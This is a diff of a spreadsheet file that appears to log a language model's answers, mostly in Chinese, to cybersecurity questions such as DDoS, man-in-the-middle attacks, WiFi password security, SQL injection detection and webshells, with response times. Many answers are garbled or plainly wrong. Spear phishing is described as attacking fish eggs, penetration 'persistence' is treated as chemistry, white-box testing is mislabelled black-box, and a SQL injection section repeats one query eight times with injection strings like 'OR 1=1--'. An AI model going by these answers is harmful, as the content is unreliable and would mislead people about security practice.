-10. Insider threat indicators: Internal intruders may leave behind indicators of their activities, such as unapproved software installations, unusual access to sensitive data, or changes to system settings that are not typical of legitimate users.
-These are just some of the common traces of internal network intrusion that can be detected through forensic analysis. The specific traces left behind will depend on the nature of the intrusion and the tactics used by the intruder.&lt;/s&gt;</t>
+          <t>内网渗透是指一个人或组织的个人信息或敏感数据在网络中被泄露或非法获取的情况。如果您的内网渗透情况，可能会留下以下痕迹：
+1. 黑客索引：黑客索引是一个人或组织的个人信息或敏感数据被泄露后，被泄露的数据被分类和存储的索引。这个索引可以用于追踪和识别您的行为。
+2.  cookies 和Local Storage：您的浏览器会在您访问网站时被设置 cookie 和 Local Storage，这些数据可以用于追踪您的行为和个人信息。
+3. 网络历史记录：您的网络历史记录可以详细显示您的网络活动，包括您访问哪些网站、哪些数据您浏览、哪些敏感数据您输入等。
+4. 敏感数据泄露：您的敏感数据，如银行卡号、个人识别号等，可能会被泄露到不正当的地方。
+5. 社交媒体私 Daten：您的社交媒体活动可能会被监控和追踪，包括您的朋友圈、评论、分享等。
+6. 邮件和消息泄露：您的邮件和消息可能会被泄露到不正当的地方，包括邮件服务商、社交媒体平台等。
+7. 攻击和黑客行为：您的内网渗透情况可能会被黑客利用，对您的账户或系统进行攻击或非法访问。
+如果您发现您的内网渗透情况，可以采取以下措施：
+1. 升级浏览器和安全软件：使用最新的浏览器和安全软件，可以减少您的网络渗透风险。
+2. 启用 two-factor authentication：使用 two-factor authentication 可以增加您的账户安全性，防止您的账户被非法访问。
+3. 卸载不必要的扩展：卸载不必要的扩展可以减少您的网络渗透风险。
+4. 隐私化您的数据：使用隐私化工具，可以帮助您隐私化您的数据，防止泄露。
+5. 时间跟踪：通过时间跟踪，可以了解您的网络活动，检测和防止泄露。
+总之，您需要采取一系列的措施来防止和减少内网渗透风险，包括升级浏览器和安全软件，启用 two-factor authentication，卸载不必要的扩展，隐私化您的数据，以及时间跟踪等。</t>
         </is>
       </c>
       <c r="D44" t="n">
-        <v>14.7219352722168</v>
+        <v>26.85030555725098</v>
       </c>
     </row>
     <row r="45">
@@ -1646,21 +1682,17 @@
       </c>
       <c r="C45" t="inlineStr">
         <is>
-          <t>？
-在渗透过程中，渗透物质会随着时间的推移而掺拌到固体材料中。这个过程可以通过一些方式来实现持久化。以下是一些可能有用的方法：
-1. 使用气囊：可以将渗透物质固定在气囊中，从而避免它们与固体材料掺拌。
-2. 使用绝缘层：可以在渗透物质和固体材料之间增加一层绝缘层，从而防止渗透物质与固体材料直接接触。
-3. 使用气囊底弹：可以将渗透物质固定在气囊中，并将气囊底部压缩，从而防止渗透物质从气囊中掺拌到固体材料中。
-4. 使用吸附剂：可以在渗透物质和固体材料之间添加一种吸附剂，从而吸附渗透物质，从而防止它们与固体材料掺拌。
-5. 使用渗透剂：可以将渗透物质替换为一种渗透剂，该剂可以帮助渗透物质快速掺拌到固体材料中，从而避免渗透物质与固体材料之间的掺拌。
-6. 使用气囊填充物：可以将渗透物质固定在气囊中，并将气囊填充一种材料，以防止渗透物质与固体材料之间的掺拌。
-7. 使用气囊底部约束：可以将渗透物质固定在气囊中，并将气囊底部约束，从而防止渗透物质从气囊中掺拌到固体材料中。
-8. 使用渗透剂涂层：可以将渗透剂涂抹到固体材料表面，以便渗透物质快速掺拌到固体材料中。
-这些方法可以单独使用，也可以组合使用，以实现持久化。需要注意的是，每种方法都有其特点和缺点，需要根据具体情况进行选择和评估。&lt;/s&gt;</t>
+          <t>渗透是指在一个固体中，另一个固体或液体通过固体表面的过程。在渗透过程中，液体会受到固体表面的阻力，因此会产生一定的抵抗力。为了减少这些抵抗力，可以使用持久化剂，以增强液体和固体之间的相互作用。
+持久化剂的添加可以使渗透过程中液体和固体之间的相互作用更加强大，从而减少抵抗力，提高渗透率。通常情况下，液体和固体之间的相互作用可以通过以下方式实现：
+1. 添加气泡剂：气泡剂可以增强液体和固体之间的相互作用，使液体更加快速地渗透到固体中。
+2. 添加润浊剂：润浊剂可以增强液体和固体之间的相互作用，使液体更加稳定地渗透到固体中。
+3. 添加杂質：杂質可以增强液体和固体之间的相互作用，使液体更加快速地渗透到固体中。
+4. 添加热剂：热剂可以增强液体和固体之间的相互作用，使液体更加快速地渗透到固体中。
+需要注意的是，不同的材料和环境中的渗透过程可能具有不同的特点和要求，因此在选择持久化剂时，需要根据实际情况进行选择和调整。</t>
         </is>
       </c>
       <c r="D45" t="n">
-        <v>23.2457709312439</v>
+        <v>15.32088589668274</v>
       </c>
     </row>
     <row r="46">
@@ -1674,17 +1706,17 @@
       </c>
       <c r="C46" t="inlineStr">
         <is>
-          <t>？
-鱼叉攻击和钓鱼攻击都是指攻击人类或其他生物，但是它们之间有一些区别。
-鱼叉攻击是指用某种方式攻击或威胁人类，以达到某种目的，常常是为了获取某种利益或者损害对手。例如，黑mail攻击、跟踪攻击、恶意软件攻击等。
-钓鱼攻击是指用某种方式欺骗或欺负人类，以达到某种目的，常常是为了获取某种利益或者损害对手。例如，骗掉钱的攻击、诈骗攻击、诱拐攻击等。
-区别在于，鱼叉攻击通常是指通过某种技术或方式对人类进行攻击，而钓鱼攻击通常是指通过谎言或欺骗的方式对人类进行攻击。
-例如，鱼叉攻击可能是通过破坏网站或者病毒攻击，而钓鱼攻击可能是通过诈骗或者欺骗来捞取钱或者个人信息。
-总之，鱼叉攻击和钓鱼攻击都是指攻击人类，但是它们之间的方式、目的和影响不同，因此应该在具体情况下进行区别和识别。&lt;/s&gt;</t>
+          <t>鱼叉攻击和钓鱼攻击都是指通过攻击鱼鱼蛋来杀死鱼或者驱逐其他鱼，但是它们之间还有一些区别。以下是一些主要的区别：
+1. 目的：鱼叉攻击的目的是获取鱼蛋或者杀死鱼，而钓鱼攻击的目的是捕捞鱼。
+2. 攻击方式：鱼叉攻击通常使用特殊的鱼叉，攻击鱼蛋或者鱼身，而钓鱼攻击通常使用钓鱼网或者钓鱼杆，抓捕鱼。
+3. 时间：鱼叉攻击通常发生在鱼蛋孵化期间，即鱼蛋在水中孵化的时间，而钓鱼攻击通常发生在鱼鱼蛋孵化完成后，即鱼已经成长为成体。
+4. 影响：鱼叉攻击可能会导致鱼蛋损害或者毁灭，而钓鱼攻击可能会导致鱼 популяción减少或者鱼类型的失业。
+5. 适用对象：鱼叉攻击通常适用于捕捞鱼蛋，而钓鱼攻击通常适用于捕捞成体的鱼。
+总的来说，鱼叉攻击和钓鱼攻击都是鱼类的捕捞方式，但它们之间还有一些区别。</t>
         </is>
       </c>
       <c r="D46" t="n">
-        <v>13.22514367103577</v>
+        <v>13.8519241809845</v>
       </c>
     </row>
     <row r="47">
@@ -1698,20 +1730,23 @@
       </c>
       <c r="C47" t="inlineStr">
         <is>
-          <t>？
-Intermediate attack means an attack that is launched by a third party against a target, often with the intention of disrupting or gaining control of the target. This type of attack is more sophisticated than a basic distributed denial-of-service (DDoS) attack, as it can be launched from multiple sources and can use various techniques to evade detection. Intermediate attacks are often launched by organized crime groups or nation-states, and can have significant impact on the target's operations and reputation.
-Here are some common types of intermediate attacks:
-1. Botnet attacks: These are attacks where a hacker uses a network of compromised computers to launch a large volume of traffic against a target. Botnets can be used to overwhelm a website or network with traffic, making it difficult or impossible to access.
-2. Reflective attacks: These are attacks where a hacker uses a third party's network or resources to launch an attack against a target. Reflective attacks can be difficult to detect, as the traffic appears to be coming from legitimate sources.
-3. Amplification attacks: These are attacks where a hacker uses a third party's network or resources to amplify the traffic being sent against a target. Amplification attacks can be used to overwhelm a target with traffic, making it difficult or impossible to access.
-4. DNS amplification attacks: These are attacks where a hacker uses a third party's network or resources to launch a DNS amplification attack against a target. DNS amplification attacks can be used to overwhelm a target with traffic, making it difficult or impossible to access.
-5. Naming service attacks: These are attacks where a hacker uses a third party's network or resources to launch a naming service attack against a target. Naming service attacks can be used to disrupt a target's operations by manipulating the target's DNS records.
-6. Man-in-the-middle attacks: These are attacks where a hacker intercepts communication between a target and a third party, altering the communication in some way. Man-in-the-middle attacks can be used to steal sensitive information, inject malware, or disrupt communication.
-Intermediate attacks can be launched from anywhere in the world, and can be difficult to detect and defend against. They often require a significant amount of resources and expertise to launch, and can have significant impact on the target's operations and reputation.&lt;/s&gt;</t>
+          <t>中间人攻击（Man-in-the-middle attack）是一种网络攻击方式，它发生在客户端和服务器之间的中间处理器（中间人）协助进行攻击。在这种攻击中，中间人可以篡改或 intercept 客户端和服务器之间的通信，从而带来安全风险。
+通常，中间人攻击会利用破坏客户端和服务器之间的通信，使得中间人能够在通信过程中 intervene 和 tamper with the communication。这可能会导致客户端和服务器之间的通信被隐藏、修改或篡改，从而带来安全风险。
+中间人攻击的攻击方式包括：
+1.  intercept 通信：中间人可以 intercept 客户端和服务器之间的通信，并产生自己的回复。
+2.  modify 通信：中间人可以篡改客户端和服务器之间的通信，以达到攻击目的。
+3.  replay 通信：中间人可以重复客户端和服务器之间的通信，以达到攻击目的。
+4.  impersonation 攻击：中间人可以 pretend 自己是客户端或服务器，并产生自己的回复。
+中间人攻击可以用于访问受到保护的网络资源，如银行网络、电子银行账户和其他敏感信息。因此，保护自己的网络安全很重要。一些常见的防范措施包括：
+1. 使用安全套件：使用安全套件可以帮助防止中间人攻击。
+2. 使用https：使用https可以加密通信，防止中间人攻击。
+3. 防止破坏：防止破坏客户端和服务器之间的通信，以防止中间人攻击。
+4. 防止跟踪：防止跟踪客户端和服务器之间的通信，以防止中间人攻击。
+总之，中间人攻击是一种常见的网络攻击方式，可以利用中间人协助进行攻击。因此，保护自己的网络安全很重要，采取适当的防范措施。</t>
         </is>
       </c>
       <c r="D47" t="n">
-        <v>12.84392380714417</v>
+        <v>19.72140741348267</v>
       </c>
     </row>
     <row r="48">
@@ -1725,15 +1760,20 @@
       </c>
       <c r="C48" t="inlineStr">
         <is>
-          <t>？
-灰盒测试和白盒测试是指在软件开发阶段进行的测试方法。
-灰盒测试（Gray Box Testing）是指在软件代码的概念和模型中进行测试，但不详细了解代码实现细节。通过观察代码行为和输入输出行为，检查代码是否按照预期工作。
-白盒测试（Black Box Testing）是指不考虑软件代码的实现细节，直接对用户 Input 和输出行为进行测试。通过几种不同的 input 和输出值，检查软件是否能够正确地处理它们。
-两种方法都是软件测试的基本方法之一，可以单独使用或结合使用，以满足不同的测试需求。&lt;/s&gt;</t>
+          <t>How does gray box testing and white box testing differ?
+Gray box testing and white box testing are two types of software testing methods used to evaluate the quality and functionality of software. The terms "gray box" and "white box" refer to the level of visibility and accessibility of the software's internal workings and code during testing.
+Gray box testing, also known as behavior-driven testing, is a testing method that focuses on the software's external behavior and interactions with the user, without revealing the internal workings of the software. In gray box testing, the tester observes how the software behaves and interacts with the user, but does not have direct access to the software's code or internal structures. This type of testing is useful for evaluating the overall functionality and user experience of the software.
+White box testing, on the other hand, involves testing the software's internal structures and code. In white box testing, the tester has full access to the software's code and can manipulate it to evaluate its behavior and functionality. This type of testing is useful for evaluating the software's design, architecture, and performance.
+The key differences between gray box and white box testing are:
+1. Visibility: Gray box testing provides limited visibility into the software's internal workings, while white box testing provides full visibility.
+2. Accessibility: Gray box testing does not provide direct access to the software's code, while white box testing provides full access.
+3. Focus: Gray box testing focuses on the software's external behavior and interactions with the user, while white box testing focuses on the software's internal structures and code.
+4. Approach: Gray box testing typically involves a more user-focused approach, while white box testing typically involves a more technical and detailed approach.
+By using both gray box and white box testing, software developers and testers can gain a comprehensive understanding of the software's functionality, performance, and quality, and identify any defects or issues that may arise.</t>
         </is>
       </c>
       <c r="D48" t="n">
-        <v>6.890358448028564</v>
+        <v>10.42360925674438</v>
       </c>
     </row>
     <row r="49">
@@ -1747,30 +1787,32 @@
       </c>
       <c r="C49" t="inlineStr">
         <is>
-          <t>？
-作者：吴晨
-WiFi密码的破解是一个常见的问题，它可能会导致您的个人隐私和网络安全受到威胁。在这篇文章中，我们将详细介绍Why WiFi密码会被破解，以及如何加强WiFi安全。
-Why WiFi密码会被破解？
-WiFi密码的破解可能是由于以下原因：
-1. 密码的简单性：相比于其他类型的密码，WiFi密码的长度和复杂性通常较低。这可能使其更容易被破解。
-2. 无需输入密码：在许多情况下，您可能不需要输入WiFi密码，例如在您的设备自动连接到WiFi网络时。这可能使攻击者更容易破解您的密码。
-3. 泄露的密码：如果您的WiFi密码已经泄露，那么攻击者可能已经有了您的密码。
-4. 病毒和黑客：病毒和黑客可能会在您的设备上安装病毒或黑客软件，以便窃取您的个人隐私和网络安全。
+          <t>WiFi密码为什么会被破解？
+------------------------------------
+WiFi密码会被破解的原因有很多，以下是常见的原因：
+1. **普通password**：使用简单的密码，如“123456”、“password”等，容易被破解。
+2. **小于8位的密码**：使用密码小于8位，容易被破解。
+3. **同一密码使用于多个设备**：使用同一个密码 для多个设备，容易被破解。
+4. **不够复杂的生成方法**：使用简单的生成方法，容易被破解。
+5. **缺乏安全措施**：缺乏安全措施，例如不启用WPA2 protocol，不使用Firewall等。
 如何加强WiFi安全？
-以下是一些可能有助于加强WiFi安全的方法：
-1. 使用复杂的密码：使用复杂的密码可以增加您的WiFi密码的安全性。建议使用至少8位的字符串，并避免使用容易被猜测的密码，例如您的姓名、生日或特定的数字。
-2. 需要输入密码：通过要求您输入WiFi密码每次连接时，可以增加您的WiFi安全性。这可能防止攻击者窃取您的密码。
-3. 使用WPA2 protocol：WPA2是现代WiFi安全标准，它使用了加密和非对称加密技术来保护您的网络安全。建议使用WPA2 protocol来加强您的WiFi安全。
-4. 禁用SSID显示：禁用SSID显示可以减少攻击者窃取您的WiFi密码的可能性。
-5. 使用 firewall：使用 firewall 可以增加您的网络安全性，防止攻击者窃取您的网络数据。
-6. 监控网络活动：监控网络活动可以帮助您发现和防止网络安全威胁。
-7. 升级设备：升级您的设备可以增加您的WiFi安全性。例如，升级到最新的操作系统和安全软件可以增加您的安全性。
-结论
-WiFi密码的破解是一个常见的问题，它</t>
+-------------------------
+以下是加强WiFi安全的方法：
+1. **使用复杂的密码**：使用复杂的密码，至少8位，包括大小写字母、数字和特殊符号。
+2. **不同密码使用于多个设备**：使用不同的密码 для每个设备，提高安全性。
+3. **启用WPA2 protocol**：使用WPA2 protocol，即时密码加密，提高安全性。
+4. **使用Firewall**：启用Firewall，防止来自网络外部的攻击。
+5. **不开放无需的端口**：不开放无需的端口，防止攻击者入侵。
+6. **不使用SSID**：不显示SSID，防止攻击者猜测SSID。
+7. **不使用WEP**：不使用WEP protocol，它不安全，易受攻击。
+8. **升级 router  firmware**：升级 router  firmware，使其有最新的安全更新。
+9. **使用VPN**：使用VPN，防止攻击者 intercept 或 劫持数据。
+10. **定期更新WiFi密码**：定期更新WiFi密码，防止攻击者猜测密码。
+总之，加强WiFi安全需要在多个方面进行加强，包括使用复杂密码、启用WPA2 protocol、使用Firewall、不开放无需的端口等。同时，也需要避免使用易攻击的 Settings，例如不显示SSID，不使用WEP等。</t>
         </is>
       </c>
       <c r="D49" t="n">
-        <v>25.08624315261841</v>
+        <v>19.39098906517029</v>
       </c>
     </row>
     <row r="50">
@@ -1785,24 +1827,21 @@
       <c r="C50" t="inlineStr">
         <is>
           <t>它？
-DDoS攻击是一种网络攻击，它通过多个来源发送大量请求，以压力攻击被攻击者的网络或服务器。这种攻击通常来自一个或多个虚幕网络，虚幕网络通常是由受到控制的黑客或恶意软件控制的系统。
-DDoS攻击可以从多个方面来攻击，例如：
-1. 网络压力攻击：通过尝试连接多个服务器或网络，以增加它们的吞吐量，以使它们不能承受更多的请求。
-2. 端到端攻击：通过在受到攻击的网络之间创建一个偽裝的端到端连接，以增加它们的吞吐量。
-3. 应用层攻击：通过使用特殊的应用层攻击方式，例如恶意请求或压力请求，以攻击受到攻击的应用程序。
-避免DDoS攻击的方法有以下几点：
-1. 增加网络的吞吐量和准备性：通过增加网络的吞吐量和准备性，以承受更多的请求。
-2. 使用防火墙和网络安全产品：使用防火墙和网络安全产品，例如防火墙、防恶意软件、防端到端攻击等，以防止攻击。
-3. 增加网络的灵活性：通过增加网络的灵活性，以适应不同的吞吐量和压力。
-4. 增加网络的稳定性：通过增加网络的稳定性，以避免因为攻击而导致的网络崩溃。
-5. 寻求专业的帮助：如果您的网络受到了DDoS攻击，可以寻求专业的帮助，例如咨询公司、安全提供商等。
-6. 实施DDoS防御策略：实施DDoS防御策略，例如防止攻击者注册IP地址、屏蔽攻击者的请求、筛选受到攻击的请求等。
-7. 实施网络监控和风险评估：实施网络监控和风险评估，以检测和反制DDoS攻击。
-总之，避免DDoS攻击需要强大的网络设备和高级的网络安全技术，同时也需要增加网络的灵活性和稳定性。&lt;/s&gt;</t>
+DDoS攻击是一种网络攻击，其中攻击者使用多个黑客机器或设备共同攻击受害者的网络，以增加受害者网络的流量、包大小或连接数，使其无法正常处理请求和流量，从而导致网络崩溃或延迟。
+避免DDoS攻击有以下方法：
+1. 防御策略：编制出适应的防御策略，对DDoS攻击做出应对，例如增加网络响应速度、增加网络容量、采用增加网络安全性等方法。
+2. 防火墙配置：设置防火墙规则，防止攻击者发送请求到受害者网络，并且防止受害者网络发送请求到攻击者网络。
+3. 数据隔离：将受害者网络分为多个分层网络，每个分层网络都可以处理一定的流量，从而避免网络崩溃或延迟。
+4. 缓冲存储：使用缓冲存储来缓冲受害者网络的流量，从而避免网络崩溃或延迟。
+5. 备用网络：建立备用网络，以防止受害者网络的不可靠性，从而避免DDoS攻击对受害者网络的影响。
+6. 协议约束：使用协议约束，限制攻击者发送请求的速度和数量，从而避免DDoS攻击。
+7. 防范攻击工具：使用防范攻击工具，例如防范攻击软件、防范攻击服务等，来防止DDoS攻击。
+8. 协作和合作：与其他伙伴或组织合作，共同承担风险，从而避免DDoS攻击对受害者网络的影响。
+需要注意的是，避免DDoS攻击并不是一个简单的任务，需要根据具体情况选择合适的防御策略。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D50" t="n">
-        <v>24.63602948188782</v>
+        <v>20.86743378639221</v>
       </c>
     </row>
     <row r="51">
@@ -1816,21 +1855,68 @@
       </c>
       <c r="C51" t="inlineStr">
         <is>
-          <t>？
-SQL注入是一种常见的web应用安全漏洞，可以使攻击者获取或修改数据。以下是一些方法来检测SQL注入攻击：
-1. 使用SQL Injection Scanner：SQL Injection Scanner是一个免费的工具，可以帮助您检测Web应用程序中的SQL注入攻击。您可以在您的Web应用程序上运行该工具，以detect potential SQL injection vulnerabilities。
-2. 查看URL中的变量：检查URL中的变量，是否包含可能的SQL注入攻击。例如，如果您的Web应用程序接受URL中的用户名和密码，那么这些变量可能会被攻击者利用来访问您的数据。
-3. 查看请求体中的变量：检查请求体中的变量，是否包含可能的SQL注入攻击。例如，如果您的Web应用程序接受请求体中的数据，那么这些变量可能会被攻击者利用来访问您的数据。
-4. 使用漏洞扫描工具：您可以使用漏洞扫描工具，如Nessus或OpenVAS，来检测您的Web应用程序中的SQL注入攻击。这些工具可以扫描您的Web应用程序，并检测可能的漏洞。
-5. 使用 manual SQL injection：您可以手动输入SQL注入攻击，以检测您的Web应用程序中的漏洞。例如，您可以输入一个特殊的请求，以访问您的数据。如果您的Web应用程序可以处理这种请求，那么您的应用程序可能存在SQL注入攻击。
-6. 使用检查SQL语句：您可以使用SQL语句检查工具，如 Burp Suite或ZAP，来检测您的Web应用程序中的SQL注入攻击。这些工具可以检查您的Web应用程序，并检测可能的漏洞。
-7. 使用检查SQL语句：您可以使用检查SQL语句工具，如 OWASP ZAP，来检测您的Web应用程序中的SQL注入攻击。这些工具可以检查您的Web应用程序，并检测可能的漏洞。
-8. 使用漏洞扫描工具：您可以使用漏洞扫描工具，如Nessus或OpenVAS，来检测您的Web应用程序中的SQL注入攻击。这些工具可以扫描您的Web应用程序，并检测可能的漏洞。
-总之，您需要使用多种方法来检测SQL注入攻击。这些方法可以帮助您检测您的Web应用程序中的漏洞，并帮助您保护您的数据安全。&lt;/s&gt;</t>
+          <t>SQL注入是一种常见的web应用程序攻击方式，可以使得攻击者在数据库中执行任意操作，从而导致数据泄露或数据库操作异常。这篇文章将详细介绍如何检测SQL注入攻击。
+1. 使用SQL注入词法
+SQL注入词法是一种常用的检测方式，可以帮助检测SQL注入攻击。这种方法通常采用字符串替换或字符串分析等方法，检测SQL语句中是否包含特定的字符串。
+例如，可以使用以下SQL注入词法来检测SQL注入攻击：
+```sql
+SELECT * FROM users WHERE name LIKE '% administrator%';
+```
+在这种情况下，如果攻击者 inserts 一个SQL注入字符串，例如，`Robert% OR 1=1--`)，则这个语句将返回所有用户信息。
+2. 使用黑客技术
+黑客技术是一种常用的检测方式，可以帮助检测SQL注入攻击。这种方法通常采用一系列的测试，以检测SQL语句中是否包含特定的黑客技术。
+例如，可以使用以下黑客技术来检测SQL注入攻击：
+```sql
+SELECT * FROM users WHERE name LIKE '% --%';
+```
+在这种情况下，如果攻击者 inserts 一个SQL注入字符串，例如，`Robert% -- OR 1=1--`)，则这个语句将返回所有用户信息。
+3. 使用宏执行
+宏执行是一种常用的检测方式，可以帮助检测SQL注入攻击。这种方法通常采用一系列的宏函数，以检测SQL语句中是否包含特定的宏函数。
+例如，可以使用以下宏函数来检测SQL注入攻击：
+```sql
+SELECT * FROM users WHERE name LIKE '%--%';
+```
+在这种情况下，如果攻击者 inserts 一个SQL注入字符串，例如，`Robert% -- OR 1=1--`)，则这个语句将返回所有用户信息。
+4. 使用规则检测
+规则检测是一种常用的检测方式，可以帮助检测SQL注入攻击。这种方法通常采用一系列的规则，以检测SQL语句中是否包含特定的规则。
+例如，可以使用以下规则来检测SQL注入攻击：
+```sql
+SELECT * FROM users WHERE name LIKE '% OR 1=1%';
+```
+在这种情况下，如果攻击者 inserts 一个SQL注入字符串，例如，`Robert% OR 1=1--`)，则这个语句将返回所有用户信息。
+5. 使用扫描检测
+扫描检测是一种常用的检测方式，可以帮助检测SQL注入攻击。这种方法通常采用一种扫描语句，以检测SQL语句中是否包含特定的注入字符串。
+例如，可以使用以下扫描语句来检测SQL注入攻击：
+```sql
+SELECT * FROM users WHERE name LIKE '%--%';
+```
+在这种情况下，如果攻击者 inserts 一个SQL注入字符串，例如，`Robert% -- OR 1=1--`)，则这个语句将返回所有用户信息。
+6. 使用缓存检测
+缓存检测是一种常用的检测方式，可以帮助检测SQL注入攻击。这种方法通常采用一种缓存机制，以检测SQL语句中是否包含特定的注入字符串。
+例如，可以使用以下缓存语句来检测SQL注入攻击：
+```sql
+SELECT * FROM users WHERE name LIKE '%--%';
+```
+在这种情况下，如果攻击者 inserts 一个SQL注入字符串，例如，`Robert% -- OR 1=1--`)，则这个语句将返回所有用户信息。
+7. 使用批处理检测
+批处理检测是一种常用的检测方式，可以帮助检测SQL注入攻击。这种方法通常采用一种批处理语句，以检测SQL语句中是否包含特定的注入字符串。
+例如，可以使用以下批处理语句来检测SQL注入攻击：
+```sql
+SELECT * FROM users WHERE name LIKE '%--%';
+```
+在这种情况下，如果攻击者 inserts 一个SQL注入字符串，例如，`Robert% -- OR 1=1--`)，则这个语句将返回所有用户信息。
+8. 使用漏洞检测
+漏洞检测是一种常用的检测方式，可以帮助检测SQL注入攻击。这种方法通常采用一种漏洞检测语句，以检测SQL语句中是否包含特定的注入字符串。
+例如，可以使用以下漏洞检测语句来检测SQL注入攻击：
+```sql
+SELECT * FROM users WHERE name LIKE '%--%';
+```
+在这种情况下，如果攻击者 inserts 一个SQL注入字符串，例如，`Robert% -- OR 1=1--`)，则这个语句将返回所有用户信息。
+总之，检测SQL注入攻击需要采用多种检测方式，以确保检测的精度和完整性。通过使用上述的检测方式，可以帮助防止SQL注入攻击和数据泄露。</t>
         </is>
       </c>
       <c r="D51" t="n">
-        <v>24.30550742149353</v>
+        <v>46.97012424468994</v>
       </c>
     </row>
     <row r="52">
@@ -1844,19 +1930,18 @@
       </c>
       <c r="C52" t="inlineStr">
         <is>
-          <t>是否已经执行了？
-如果您的WebShell已经执行了，您可以通过以下方式来检测它：
-1. 检查服务器日志：WebShell可能会创建一个备份或者日志文件，您可以通过检查服务器日志来检测它的执行结果。
-2. 使用Network Traffic Analyzer：您可以使用Network Traffic Analyzer来监控网络流量，检查是否有任何不明确的网络流量，这可能是WebShell的执行结果。
-3. 检查服务器的性能：如果WebShell执行了，服务器的性能可能会受到影响，您可以通过检查服务器的性能指标来检测它的执行结果。
-4. 使用Antivirus软件：您可以使用Antivirus软件来检测WebShell是否已经执行了，它可能会检测到WebShell的执行结果。
-5. 检查服务器的文件系统：如果WebShell执行了，它可能会 modify 服务器的文件系统，您可以通过检查服务器的文件系统来检测它的执行结果。
-6. 使用WebShell检测工具：您可以使用WebShell检测工具来检测WebShell是否已经执行了，这些工具可能会检测到WebShell的执行结果。
-请注意，检测WebShell是否已经执行了可能需要一些时间和资源，特别是如果WebShell是一个复杂的脚本。&lt;/s&gt;</t>
+          <t>的 Presence？
+Webshell是一种危险的软件，可以在Web服务器上运行 malicious 代码。如果您想了解Webshell的 Presence，以下是一些可能的方法：
+1. 监测网站的访问速度和响应时间：Webshell可能会对服务器的访问速度和响应时间产生影响，因此您可以通过监测网站的访问速度和响应时间来检测Webshell的 Presence。如果访问速度很慢或响应时间很长，可能表示Webshell的存在。
+2. 监测网站的安全漏洞：Webshell可能会使用潜在的安全漏洞来访问服务器，因此您可以通过监测网站的安全漏洞来检测Webshell的 Presence。使用安全检查工具，例如 Burp Suite 或 ZAP，来检查网站的安全漏洞。
+3. 监测网站的行为：Webshell可能会改变网站的行为，例如 modify 页面内容、添加隐藏域或者修改服务器配置。您可以通过监测网站的行为来检测Webshell的 Presence。如果您发现页面内容或服务器配置发生了改变，可能表示Webshell的存在。
+4. 使用WebShell检测工具：有些工具可以帮助您检测Webshell的 Presence，例如 WebShell Hunter、WebShell Detector 等。这些工具可以检测服务器上是否存在Webshell，并提供可靠的检测结果。
+5. 咨询专业人士：如果您对Webshell的检测和纠正不熟悉，可以咨询专业人士或安全公司，他们可以帮助您检测和纠正Webshell的 Presence。
+请注意，检测Webshell的 Presence并不是一件容易的任务，需要有技术知识和经验。如果您发现了可疑的网站行为，建议通过专业人士或安全公司进行检测和纠正。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D52" t="n">
-        <v>13.30484080314636</v>
+        <v>16.80372762680054</v>
       </c>
     </row>
     <row r="53">
@@ -1870,20 +1955,22 @@
       </c>
       <c r="C53" t="inlineStr">
         <is>
-          <t>？
-网络安全归因分析（Network Security Anomaly Detection）是一种可以帮助企业检测和识别网络中的安全异常行为的技术。以下是一些有用的指导，可以帮助您做网络安全归因分析：
-1. 了解您的网络环境：了解您的网络环境是第一步。了解您的网络结构，包括网络设备、网络服务器、客户端和网络应用程序。了解这些元素的特点和攻击风险，以便更好地针对异常行为。
-2. 使用数据分析：通过对网络数据进行分析，可以检测到异常行为。您可以使用网络监控工具来收集网络数据，然后使用数据分析工具来检测异常行为。
-3. 设置严格的策略：在检测异常行为时，您可以设置严格的策略来阻止异常行为。例如，您可以使用防火墙或安全规则来阻止不明确的网络流量。
-4. 利用人工智能（AI）和机器学习（ML）：人工智能和机器学习技术可以帮助您自动检测和识别异常行为。您可以使用这些技术来分析网络数据，并根据分析结果自动采取应急措施。
-5. 监控和评估：监控和评估网络安全归因分析是非常重要的。您需要监控网络安全归因分析的实时性和精度，并评估其效果。
-6. 兼容性和可扩展性：您需要选择一种兼容性和可扩展性异常行为检测工具，以便它能够适应您的网络环境和需求。
-7. 维护和升级：网络安全归因分析是一个不断发展的领域，您需要维护和升级您的工具，以便能够满足您的网络安全需求。
-总之，网络安全归因分析是一种重要的网络安全技术，它可以帮助您检测和识别网络中的安全异常行为。但是，您需要选择一种适合您的网络环境和需求的工具，并不断监控和评估其效果。&lt;/s&gt;</t>
+          <t>网络安全归因分析是一种分析方法，用于推断网络中的攻击者或恶意软件的归因，以便进行应对和防范措施。以下是一些常用的网络安全归因分析技术和方法：
+1. 网络风险评估：这种方法通过对网络中的资源和数据进行评估，以确定哪些部署是最易受到攻击的。
+2. 网络流量分析：通过分析网络流量，可以了解网络中的活动，包括端到端流量、流量趋势和流量分布。
+3. 网络隐私分析：通过分析网络上的数据和信息，可以了解网络中的人员和设备之间的关系，以及攻击者可能的归因。
+4. 网络攻击模型：通过建立网络攻击模型，可以预测攻击者的行为和攻击方式，并为网络安全提供预测和防范。
+5. 机器学习和深度学习：通过使用机器学习和深度学习技术，可以对网络安全归因进行更加精确和有效的分析和预测。
+6. 權重分析：通过对网络中的權重进行分析，可以了解网络中的重要性和攻击点，并为网络安全提供优化和防范。
+7. 网络監控：通过监控网络中的活动和流量，可以检测和预防攻击。
+8. 安全情报分析：通过对网络中的安全情报进行分析，可以了解网络中的安全状况和攻击点，并为网络安全提供优化和防范。
+9. 攻击源分析：通过对网络中的攻击源进行分析，可以了解攻击者的来源和目的，并为网络安全提供预测和防范。
+10. 安全评估：通过对网络中的安全进行评估，可以了解网络中的安全状况和攻击点，并为网络安全提供优化和防范。
+这些技术和方法可以结合使用，以提高网络安全归因分析的精度和有效性。</t>
         </is>
       </c>
       <c r="D53" t="n">
-        <v>23.98071885108948</v>
+        <v>21.59441328048706</v>
       </c>
     </row>
     <row r="54">
@@ -1897,34 +1984,19 @@
       </c>
       <c r="C54" t="inlineStr">
         <is>
-          <t>Analysis
-Network attack tracing is the process of identifying the source of a network attack by analyzing the packets and network traffic generated by the attack. This process can help network administrators determine the origin of the attack, identify the type of attack, and take appropriate measures to mitigate the attack. In this article, we will explore the steps involved in network attack tracing and how it can help organizations improve their network security.
-Steps involved in network attack tracing
-1. Collecting network traffic data: The first step in network attack tracing is to collect network traffic data. This can be done using network monitoring tools such as Wireshark, Tcpdump, or other packet sniffing tools. The tools capture and save network packets for analysis.
-2. Analyzing network packets: Once the network traffic data is collected, the next step is to analyze the packets to identify the source of the attack. This involves examining the source and destination IP addresses, port numbers, and other packet metadata.
